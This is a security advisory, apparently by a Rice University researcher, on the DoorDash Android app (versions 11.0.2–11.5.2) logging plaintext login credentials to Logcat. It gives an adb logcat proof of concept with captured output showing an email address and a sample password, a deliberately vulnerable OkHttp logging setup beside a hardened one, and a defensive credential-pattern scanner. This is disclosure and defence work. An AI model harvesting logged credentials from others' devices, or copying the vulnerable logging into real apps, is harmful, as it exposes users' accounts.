Security Problem in DoorDash Android App

friendlyjlee Oct 7th, 2019 (edited)
# Exploit Title: DoorDash Android App - Username/Password Logging
# Application: DoorDash
# Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
# Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
# Company: DoorDash
# Installs: 10,000,000+  (#1 in food category in Google Play)
# Impact: Anyone who can read the device log (Logcat) recovers the DoorDash username (e-mail) and password in plain text
# Category: Mobile Apps
# Tested on: Android 9

---Description---
During authentication the app writes the complete login request, including the user's e-mail address and password in plain text, to the Android system log (Logcat). Anyone who can read Logcat, for example over ADB on a device with USB debugging enabled, can therefore recover a DoorDash user's credentials. On Android versions before 4.1 (Jelly Bean) the exposure is wider: any installed app could declare the READ_LOGS permission and read other apps' log output, so a malicious app could harvest the credentials on its own.
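The configuration that produces this kind of leak, and the hardened form, as an added example that is not DoorDash's code. It assumes an Android app using OkHttp with the okhttp-logging-interceptor artifact; BuildConfig.DEBUG is the Gradle-generated flag of a hypothetical app package, and HttpLoggingInterceptor.redactHeader is assumed to be available (it exists in recent versions of the interceptor). The log lines in the advisory are what Level.BODY prints: on Android the interceptor's default logger writes to the system log under the OkHttp tag.

```java
// Added example (not DoorDash's code). Assumes OkHttp + okhttp-logging-interceptor
// and an app-generated BuildConfig class (import path is hypothetical).
import okhttp3.OkHttpClient;
import okhttp3.logging.HttpLoggingInterceptor;
// import com.example.app.BuildConfig;   // assumed: the app's generated BuildConfig

public final class ApiClients {

    // VULNERABLE: Level.BODY prints every header and the full request and
    // response body to the system log. A JSON login request such as
    // {"email":"...","password":"..."} therefore lands in Logcat verbatim,
    // which is exactly what `adb logcat | grep OkHttp` reveals.
    public static OkHttpClient leakyClient() {
        HttpLoggingInterceptor logging = new HttpLoggingInterceptor();
        logging.setLevel(HttpLoggingInterceptor.Level.BODY);
        return new OkHttpClient.Builder()
                .addInterceptor(logging)
                .build();
    }

    // HARDENED: release builds get no logging interceptor at all. Debug builds
    // log only the request line and headers (never bodies), with credential-
    // bearing headers redacted, so a login POST appears as
    // "--> POST https://.../auth/token/" plus non-sensitive headers and nothing else.
    public static OkHttpClient safeClient() {
        OkHttpClient.Builder builder = new OkHttpClient.Builder();
        if (BuildConfig.DEBUG) {
            HttpLoggingInterceptor logging = new HttpLoggingInterceptor();
            logging.setLevel(HttpLoggingInterceptor.Level.HEADERS);
            logging.redactHeader("Authorization");   // bearer/basic credentials
            logging.redactHeader("Cookie");          // session identifiers
            logging.redactHeader("Set-Cookie");
            builder.addInterceptor(logging);
        }
        return builder.build();
    }
}
```

Gating on BuildConfig.DEBUG is the minimum: the leak then survives only in debug builds, which should never reach users. Not logging bodies at any level is the safer rule, since a debug build on a device with USB debugging enabled still exposes whatever is logged, and the redact list has to be kept in step with any custom header that carries a credential.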

---Vendor feedback---
We have reported this issue, and they will fix it soon.

---PoC---
1. Log in to the DoorDash Android app.
  - Open the login UI.
  - Enter credentials. Fake credentials are enough to reproduce, because the outbound request body is logged regardless of whether the login succeeds.

2. Search for the password in Logcat:
$ adb logcat | grep 'OkHttp'

10-07 16:09:34.498 10066 10201 D OkHttp  : --> POST https://api.doordash.com/v2/auth/token/
10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Type: application/json; charset=UTF-8
10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Length: 109
10-07 16:09:34.498 10066 10201 D OkHttp  : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
10-07 16:09:34.498 10066 10201 D OkHttp  : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
10-07 16:09:34.498 10066 10201 D OkHttp  : --> END POST (109-byte body)


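A grep for 'OkHttp' finds the lines but leaves the tester to read them; the scanner below, an added example that is not part of the advisory, pairs each OkHttp request or response line with the body line that follows it and reports any body carrying a credential-like JSON key. The sample log lines are constructed to mirror the advisory's output (threadtime format), with fake e-mail, password and token values; the set of sensitive keys is an assumption to extend per target.

```java
// Added example (not from the advisory): scan logcat output for OkHttp bodies
// that carry credential-like JSON keys. Sample input is constructed.
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public final class LogcatCredentialScanner {

    // One logcat line in threadtime format: "<date> <time> <pid> <tid> <level> <tag>: <payload>".
    // Only lines with the OkHttp tag are of interest.
    private static final Pattern OKHTTP_LINE =
            Pattern.compile("^\\S+ \\S+\\s+\\d+\\s+\\d+ [VDIWEF] OkHttp\\s*: ?(.*)$");
    // Request and response openers as printed by HttpLoggingInterceptor.
    private static final Pattern REQUEST_START =
            Pattern.compile("^--> (GET|POST|PUT|PATCH|DELETE) (\\S+)");
    private static final Pattern RESPONSE_START =
            Pattern.compile("^<-- (\\d{3}) (\\S+)");
    // JSON keys whose values should never reach a log (assumed list; extend per target).
    private static final Pattern SENSITIVE_KEY = Pattern.compile(
            "\"(password|passwd|pin|secret|client_secret|token|access_token|refresh_token)\"\\s*:",
            Pattern.CASE_INSENSITIVE);

    /** Returns one finding per OkHttp body line that contains a sensitive key. */
    public static List<String> scan(List<String> logcatLines) {
        List<String> findings = new ArrayList<>();
        String context = "(no request line seen)";
        for (String line : logcatLines) {
            Matcher m = OKHTTP_LINE.matcher(line);
            if (!m.matches()) continue;                 // some other tag: ignore
            String payload = m.group(1);
            Matcher req = REQUEST_START.matcher(payload);
            if (req.find()) {                           // "--> POST https://..." opens a request
                context = "request " + req.group(1) + " " + req.group(2);
                continue;
            }
            Matcher resp = RESPONSE_START.matcher(payload);
            if (resp.find()) {                          // "<-- 200 https://..." opens a response
                context = "response " + resp.group(1) + " " + resp.group(2);
                continue;
            }
            if (payload.startsWith("--> END") || payload.startsWith("<-- END")) continue;
            Matcher key = SENSITIVE_KEY.matcher(payload);
            if (key.find()) {
                findings.add(context + " logged key \"" + key.group(1) + "\": " + payload);
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample mirroring the advisory's logcat output; credentials are fake.
        List<String> sample = List.of(
            "10-07 16:09:34.498 10066 10201 D OkHttp  : --> POST https://api.doordash.com/v2/auth/token/",
            "10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Type: application/json; charset=UTF-8",
            "10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Length: 109",
            "10-07 16:09:34.498 10066 10201 D OkHttp  : {\"client_id\":\"6086ebcbfb859ee3\",\"email\":\"user@example.com\",\"is_manual\":true,\"password\":\"NotARealPassword!\"}",
            "10-07 16:09:34.498 10066 10201 D OkHttp  : --> END POST (109-byte body)",
            "10-07 16:09:35.012 10066 10201 D OkHttp  : <-- 200 https://api.doordash.com/v2/auth/token/ (514ms)",
            "10-07 16:09:35.013 10066 10201 D OkHttp  : {\"token\":\"fake-session-token\"}",
            "10-07 16:09:35.013 10066 10201 D OkHttp  : <-- END HTTP (31-byte body)",
            "10-07 16:09:35.100 10066 10201 D SomeOtherTag: password=ignored-because-wrong-tag"
        );
        for (String f : scan(sample)) System.out.println(f);
    }
}
```

Run it against `adb logcat -v threadtime` output saved to a file while exercising every screen of the app that submits a credential, not only login: a body logged during password change, 2FA or token refresh is the same class of finding.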
---Reporter---
Jaeho Lee (Jaeho.Lee@rice.edu)
Rice Computer Security Lab
Rice University